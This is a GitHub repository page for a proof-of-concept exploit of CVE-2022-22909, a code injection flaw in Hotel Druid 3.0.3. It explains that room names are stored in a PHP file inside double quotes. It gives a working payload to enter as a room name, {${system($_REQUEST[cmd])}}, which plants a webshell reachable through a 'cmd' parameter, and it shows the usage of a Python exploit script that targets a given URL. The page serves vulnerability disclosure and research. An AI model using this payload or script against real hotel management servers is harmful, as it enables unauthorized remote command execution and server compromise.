Skip to content

0z09e/CVE-2022-22909

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 
 
 
 
 

CVE-2022-22909

Description

A Code Injection vulnerability has been found on the Hotel Druid v3.0.3 application, which an attacker could exploit to execute remote code on the server. For a successful exploitation, an attacker should have the privilege to add a new room.

Vulnerability description

The vulnerability occurs because room names are getting stored inside a file named /dati/selectappartamenti.php using Double Quotes.

<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Payload

To perform a successful exploitation, add a room with the following payload as room name.

{${system($_REQUEST[cmd])}}

After adding a new room, go to /dati/selectappartamenti.php and trigger the webshell by passing a command using the cmd parameter.

Usage

usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

Example

If the application has no authentication. Use the --noauth flag to perform no authentication.

If the server has authentication enabled, use the --username and --password to perform authentication.

Credits

Researcher and POC writer - 0z09e


About

Hotel Druid 3.0.3 Code Injection to Remote Code Execution

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages